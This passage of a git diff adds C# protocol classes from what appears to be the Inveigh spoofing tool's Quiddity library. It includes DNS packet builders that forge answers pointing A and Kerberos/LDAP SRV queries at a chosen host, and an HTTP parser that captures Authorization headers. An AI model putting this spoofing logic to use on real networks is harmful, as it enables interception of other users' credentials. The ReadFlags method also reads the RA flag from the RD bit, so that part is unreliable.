OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; + +namespace Quiddity.DNS +{ + public class DNSHeader + { + // https://tools.ietf.org/html/rfc1035 + public byte[] ID { get; set; } + public bool QR { get; set; } // 1 bit + public string Opcode { get; set; } // 4 bit + public bool AA { get; set; } // 1 bit + public bool TC { get; set; } // 1 bit + public bool RD { get; set; } // 1 bit + public bool RA { get; set; } // 1 bit + public string Z { get; set; } // reserved + public string RCode { get; set; } // 4 bit + public ushort QDCount { get; set; } + public ushort ANCount { get; set; } + public ushort NSCount { get; set; } + public ushort ARCount { get; set; } + + // custom + public byte[] Flags { get; set; } + + public DNSHeader() + { + + } + + public DNSHeader(byte[] data) + { + ReadBytes(data, 0); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.ID = packetReader.ReadBytes(2); + this.Flags = packetReader.BigEndianReadBytes(2); + this.QDCount = packetReader.BigEndianReadUInt16(); + this.ANCount = packetReader.BigEndianReadUInt16(); + this.NSCount = packetReader.BigEndianReadUInt16(); + this.ARCount = packetReader.BigEndianReadUInt16(); + } + + ReadFlags(); + } + + public byte[] GetBytes() + { + WriteFlags(); + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.ID); + packetWriter.Write(this.Flags); + packetWriter.BigEndianWrite(this.QDCount); + packetWriter.BigEndianWrite(this.ANCount); + packetWriter.BigEndianWrite(this.NSCount); + packetWriter.BigEndianWrite(this.ARCount); + return memoryStream.ToArray(); + } + + } + + protected virtual void ReadFlags() + { + string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); + + if (String.Equals(flags.Substring(0, 1), "1")) + { + this.QR = true; + } + + this.Opcode = flags.Substring(1, 4); + + if (String.Equals(flags.Substring(5, 1), "1")) + { + this.AA = true; + } + + if (String.Equals(flags.Substring(6, 1), "1")) + { + this.TC = true; + } + + if (String.Equals(flags.Substring(7, 1), "1")) + { + this.RD = true; + } + + if (String.Equals(flags.Substring(7, 1), "1")) + { + this.RA = true; + } + + this.Z = flags.Substring(8, 3); + this.RCode = flags.Substring(12, 4); + } + + protected virtual void WriteFlags() + { + string flags = this.QR ? "1" : "0"; + flags += this.Opcode; + flags += this.AA ? "1" : "0"; + flags += this.TC ? "1" : "0"; + flags += this.RD ? "1" : "0"; + flags += this.RA ? "1" : "0"; + flags += this.Z; + flags += this.RCode; + byte[] bytes = new byte[2]; + + for (int i = 0; i < 2; ++i) + { + bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); + } + + this.Flags = bytes; + } + + public bool IsQuery() + { + if (!this.QR && this.QDCount == 1) + { + return true; + } + + return false; + } + + public bool IsDynamicUpdateRequest() + { + + if (!this.QR && this.Opcode.Equals("0101")) + { + return true; + } + + return false; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs new file mode 100644 index 0000000..74238d9 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSPacket.cs @@ -0,0 +1,185 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.DNS +{ + class DNSPacket + { + public DNSHeader Header { get; set; } + public DNSQuestion Question { get; set; } + public DNSResource Resource { get; set; } + public DNSResource Additional { get; set; } + + public uint TTL { get; set; } + public string Host { get; set; } + + enum ServicePort : ushort + { + Kerberos = 88, + LDAP = 389, + KPassword = 464, + GC = 3268 + } + + public DNSPacket() + { + } + + public DNSPacket(byte[] data) + { + ReadBytes(data); + } + + public DNSPacket ReadBytes(byte[] data) + { + this.Header = new DNSHeader(data); + this.Question = new DNSQuestion(data); + return this; + } + + public byte[] GetBytes(uint ttl, uint serial, string replyIP, string replyIPv6) + { + byte[] rdata = new byte[0]; + ushort arCount = 0; + ushort index = 12; + index |= (1 << 15); // set first 2 bits to 1 to indicate compression is being used + index |= (1 << 14); + byte[] indexData = BitConverter.GetBytes(index); + Array.Reverse(indexData); + byte[] nameData = this.Question.QName; + + switch (this.Question.Type) + { + case "A": + arCount = 0; + rdata = new DNSRecordA(replyIP).GetBytes(); + break; + + case "AAAA": + arCount = 0; + + if (!String.IsNullOrEmpty(replyIPv6)) + { + rdata = new DNSRecordAAAA(replyIPv6).GetBytes(); + } + + break; + + case "SRV": + arCount = 1; + nameData = indexData; + index += (ushort)(this.Question.QName.Length + 14); + ushort port = 0; + + if (this.Question.Name.StartsWith("_ldap.")) + { + port = (ushort)ServicePort.LDAP; + } + else if (this.Question.Name.StartsWith("_kerberos.")) + { + port = (ushort)ServicePort.Kerberos; + } + else if (this.Question.Name.StartsWith("_kpassword.")) + { + port = (ushort)ServicePort.KPassword; + } + else if (this.Question.Name.StartsWith("_gc.")) + { + port = (ushort)ServicePort.GC; + } + + rdata = new DNSRecordSRV().GetBytes(this.Host, port); + break; + + case "SOA": + arCount = 1; + rdata = new DNSRecordSOA(serial).GetBytes(this.Host, 12); + index += (ushort)(this.Question.QName.Length + 14); + break; + } + + this.Header = new DNSHeader + { + ID = this.Header.ID, + QR = true, + Opcode = "0000", + AA = false, + TC = false, + RD = false, + RA = false, + Z = "000", + RCode = "0000", + QDCount = 1, + ANCount = 1, + ARCount = arCount + }; + + this.Resource = new DNSResource + { + Name = nameData, + Type = this.Question.QType, + Class = this.Question.QClass, + TTL = ttl, + RDLength = (ushort)rdata.Length, + RData = rdata + }; + + if (arCount == 1) + { + this.Resource.Name = indexData; + indexData = BitConverter.GetBytes(index); + Array.Reverse(indexData); + + this.Additional = new DNSResource + { + Name = indexData, + Type = new byte[] { 0x00, 0x01 }, + Class = this.Question.QClass, + TTL = ttl, + RDLength = 4, + RData = new DNSRecordA(replyIP).GetBytes() + }; + + return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes(), this.Additional.GetBytes()); + } + + return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes()); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs new file mode 100644 index 0000000..aa91f4a --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSQuestion.cs @@ -0,0 +1,193 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; +using System.Text; + +namespace Quiddity.DNS +{ + class DNSQuestion + { + + // https://tools.ietf.org/html/rfc1035 + public byte[] QName { get; set; } + public byte[] QType { get; set; } + public byte[] QClass { get; set; } + + // Custom + public string Name { get; set; } + public string Type { get; set; } + + public DNSQuestion() + { + this.QName = new byte[0]; + this.QType = new byte[0]; + this.QClass = new byte[0]; + } + + public DNSQuestion(byte[] data) + { + ReadBytes(data, 12); + } + + public DNSQuestion(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + int segmentLength = data[offset]; + int lengthIndex = offset; + int length = segmentLength + 1; + + do + { + lengthIndex += segmentLength + 1; + segmentLength = data[lengthIndex]; + length += segmentLength + 1; + } + while (segmentLength != 0); + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.QName = packetReader.ReadBytes(length); + this.QType = packetReader.ReadBytes(2); + this.QClass = packetReader.ReadBytes(2); + } + + this.Name = ConvertName(); + this.Type = GetType(); + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.QName); + packetWriter.Write(this.QType); + packetWriter.Write(this.QClass); + return memoryStream.ToArray(); + } + + } + + protected virtual string ConvertName() + { + string hostname = ""; + int hostnameLength = this.QName[0]; + int index = 0; + int i = 0; + + do + { + int hostnameSegmentLength = hostnameLength; + byte[] hostnameSegment = new byte[hostnameSegmentLength]; + Buffer.BlockCopy(this.QName, (index + 1), hostnameSegment, 0, hostnameSegmentLength); + hostname += Encoding.UTF8.GetString(hostnameSegment); + index += hostnameLength + 1; + hostnameLength = this.QName[index]; + i++; + + if (hostnameLength > 0) + { + hostname += "."; + } + + } + while (hostnameLength != 0 && i <= 127); + + return hostname; + } + + protected new virtual string GetType() + { + string type = ""; + + switch (BitConverter.ToString(this.QType)) + { + + case "00-01": + type = "A"; + break; + + case "00-1C": + type = "AAAA"; + break; + + case "00-05": + type = "CNAME"; + break; + + case "00-27": + type = "DNAME"; + break; + + case "00-0F": + type = "MX"; + break; + + case "00-02": + type = "NS"; + break; + + case "00-0C": + type = "PTR"; + break; + + case "00-06": + type = "SOA"; + break; + + case "00-21": + type = "SRV"; + break; + + case "00-10": + type = "TXT"; + break; + + case "00-FF": + type = "ANY"; + break; + + } + + return type; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs new file mode 100644 index 0000000..f6ad4f6 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/DNSResource.cs @@ -0,0 +1,122 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System.IO; +using System.Net; + +namespace Quiddity.DNS +{ + + class DNSResource + { + + // https://tools.ietf.org/html/rfc1035 + public byte[] Name { get; set; } + public byte[] Type { get; set; } + public byte[] Class { get; set; } + public uint TTL { get; set; } + public ushort RDLength{ get; set; } + public byte[] RData { get; set; } + + //custom + public string Host { get; set; } + + public DNSResource() + { + + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Name = packetReader.ReadBytes(2); + this.Type = packetReader.ReadBytes(2); + this.Class = packetReader.ReadBytes(2); + this.TTL = packetReader.ReadUInt32(); + this.RDLength = packetReader.ReadUInt16(); + this.RData = packetReader.ReadBytes(this.RDLength); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Name); + packetWriter.Write(this.Type); + packetWriter.Write(this.Class); + packetWriter.BigEndianWrite(this.TTL); + packetWriter.BigEndianWrite(this.RDLength); + packetWriter.Write(this.RData); + return memoryStream.ToArray(); + } + + } + + public byte[] GetBytes(DNSQuestion RequestQuestion, uint ttl, string data, byte[] id) + { + byte[] rdata = IPAddress.Parse(data).GetAddressBytes(); + + DNSHeader responseHeader = new DNSHeader + { + ID = id, + QR = true, + Opcode = "0000", + AA = false, + TC = false, + RD = false, + RA = false, + Z = "000", + RCode = "0000", + QDCount = 1, + ANCount = 1 + }; + + this.Name = RequestQuestion.QName; + this.Type = RequestQuestion.QType; + this.Class = RequestQuestion.QClass; + this.TTL = ttl; + this.RDLength = (ushort)rdata.Length; + this.RData = rdata; + + return Utilities.BlockCopy(responseHeader.GetBytes(), RequestQuestion.GetBytes(), this.GetBytes()); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs new file mode 100644 index 0000000..7d15405 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordA.cs @@ -0,0 +1,33 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.DNS +{ + class DNSRecordA + { + public byte[] Address { get; set; } + + public DNSRecordA() + { + + } + + public DNSRecordA(string address) + { + this.Address = IPAddress.Parse(address).GetAddressBytes(); + } + public byte[] GetBytes() + { + return this.Address; + } + + public byte[] GetBytes(string address) + { + return IPAddress.Parse(address).GetAddressBytes(); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs new file mode 100644 index 0000000..ca63c6b --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordAAAA.cs @@ -0,0 +1,34 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Text; + +namespace Quiddity.DNS +{ + class DNSRecordAAAA + { + + public byte[] Address { get; set; } + + public DNSRecordAAAA() + { + + } + + public DNSRecordAAAA(string address) + { + this.Address = IPAddress.Parse(address).GetAddressBytes(); + } + public byte[] GetBytes() + { + return this.Address; + } + + public byte[] GetBytes(string address) + { + return IPAddress.Parse(address).GetAddressBytes(); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs new file mode 100644 index 0000000..3a233ab --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSOA.cs @@ -0,0 +1,86 @@ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DNS +{ + class DNSRecordSOA + { + // https://tools.ietf.org/html/rfc1035 + public byte[] MName { get; set; } + public byte[] RName { get; set; } + public uint Serial { get; set; } + public uint Refresh { get; set; } + public uint Retry { get; set; } + public uint Expire { get; set; } + public uint Minium { get; set; } + + public DNSRecordSOA() + { + this.Refresh = 900; + this.Retry = 600; + this.Expire = 86400; + this.Minium = 3600; + } + + public DNSRecordSOA(uint serial) + { + this.Serial = serial; + this.Refresh = 900; + this.Retry = 600; + this.Expire = 86400; + this.Minium = 3600; + } + + public byte[] GetBytes() + { + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.MName); + packetWriter.Write(this.RName); + packetWriter.BigEndianWrite(this.Serial); + packetWriter.BigEndianWrite(this.Refresh); + packetWriter.BigEndianWrite(this.Retry); + packetWriter.BigEndianWrite(this.Expire); + packetWriter.BigEndianWrite(this.Minium); + return memoryStream.ToArray(); + } + } + + public byte[] GetBytes(string host, ushort index) + { + index |= (1 << 15); + index |= (1 << 14); + byte[] indexData = BitConverter.GetBytes(index); + Array.Reverse(indexData); + + byte[] hostData = Utilities.GetDNSNameBytes(host, false); + //byte[] hostData = Utilities.GetDNSNameBytes(host, true); + byte[] hostCompressed = new byte[hostData[0] + 3]; + Buffer.BlockCopy(hostData, 0, hostCompressed, 0, hostData[0] + 1); + Buffer.BlockCopy(indexData, 0, hostCompressed, hostCompressed.Length - 2, 2); + byte[] authoritytData = Utilities.GetDNSNameBytes("hostmaster", false); + byte[] authorityCompressed = new byte[authoritytData[0] + 3]; + Buffer.BlockCopy(authoritytData, 0, authorityCompressed, 0, authoritytData[0] + 1); + Buffer.BlockCopy(indexData, 0, authorityCompressed, authorityCompressed.Length - 2, 2); + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(Utilities.GetDNSNameBytes(host, true)); + packetWriter.Write(authorityCompressed); + packetWriter.BigEndianWrite(this.Serial); + packetWriter.BigEndianWrite(this.Refresh); + packetWriter.BigEndianWrite(this.Retry); + packetWriter.BigEndianWrite(this.Expire); + packetWriter.BigEndianWrite(this.Minium); + return memoryStream.ToArray(); + } + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs new file mode 100644 index 0000000..391b671 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DNS/RDATA/DNSRecordSRV.cs @@ -0,0 +1,42 @@ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.DNS +{ + class DNSRecordSRV : DNSResource + { + // https://datatracker.ietf.org/doc/html/rfc2782 + public byte[] Service { get; set; } + public byte[] Proto { get; set; } + public ushort Priority { get; set; } + public ushort Weight { get; set; } + public ushort Port { get; set; } + public byte[] Target { get; set; } + + public DNSRecordSRV() + { + this.Priority = 0; + this.Weight = 100; + } + + public byte[] GetBytes(string target, ushort port) + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.Priority); + packetWriter.BigEndianWrite(this.Weight); + packetWriter.BigEndianWrite(port); + packetWriter.Write(Utilities.GetDNSNameBytes(target, true)); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs new file mode 100644 index 0000000..82b443e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/GSSAPI/GSSAPIInitSecContext.cs @@ -0,0 +1,49 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +namespace Quiddity.GSSAPI +{ + class GSSAPIInitSecContext + { + + /* + https://tools.ietf.org/html/rfc4178#appendix-A + */ + public byte[] OID { get; set; } + + public GSSAPIInitSecContext() + { + this.OID = new byte[8] { 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02 } ; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs new file mode 100644 index 0000000..a6e3143 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPRequest.cs @@ -0,0 +1,159 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.HTTP +{ + class HTTPRequest + { + public string Method { get; set; } + public string URI { get; set; } + public string Version { get; set; } + public string Host { get; set; } + public string Connection { get; set; } + public string UserAgent { get; set; } + public string Accept { get; set; } + public string AcceptEncoding { get; set; } + public string AcceptLanguage { get; set; } + public string Authorization { get; set; } + public string ProxyAuthorization { get; set; } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + int index = Array.IndexOf(data, 0x20, 0); + + if (index > -1) + { + this.Method = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); + memoryStream.Position++; + index = Array.IndexOf(data, 0x20, (int)memoryStream.Position); + + if (index > -1) + { + index -= (int)memoryStream.Position; + this.URI = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); + memoryStream.Position++; + index = Array.IndexOf(data, 0x0d, (int)memoryStream.Position); + + if (index > -1) + { + index -= (int)memoryStream.Position; + this.Version = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); + memoryStream.Position += 2; + } + + } + + } + + while (index > -1) + { + index = Array.IndexOf(data, 0x20, (int)memoryStream.Position); + + if (index > -1) + { + index -= (int)memoryStream.Position; + string field = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); + memoryStream.Position++; + index = Array.IndexOf(data, 0x0d, (int)memoryStream.Position); + index -= (int)memoryStream.Position; + + if (index > -1) + { + string value = Encoding.UTF8.GetString(packetReader.ReadBytes(index)); + GetField(field, value); + } + + memoryStream.Position += 2; + } + + } + + } + + } + + public void GetField(string field, string value) + { + + switch (field.ToUpper()) + { + + case "HOST:": + this.Host = value; + break; + + case "CONNECTION:": + this.Connection = value; + break; + + case "USER-AGENT:": + this.UserAgent = value; + break; + + case "ACCEPT:": + this.Accept = value; + break; + + case "ACCEPT-ENCODING:": + this.AcceptEncoding = value; + break; + + case "ACCEPT-LANGUAGE:": + this.AcceptLanguage = value; + break; + + case "AUTHORIZATION:": + this.Authorization = value; + break; + + case "PROXY-AUTHORIZATION:": + this.ProxyAuthorization = value; + break; + + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs new file mode 100644 index 0000000..b5d2898 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/HTTP/HTTPResponse.cs @@ -0,0 +1,166 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used 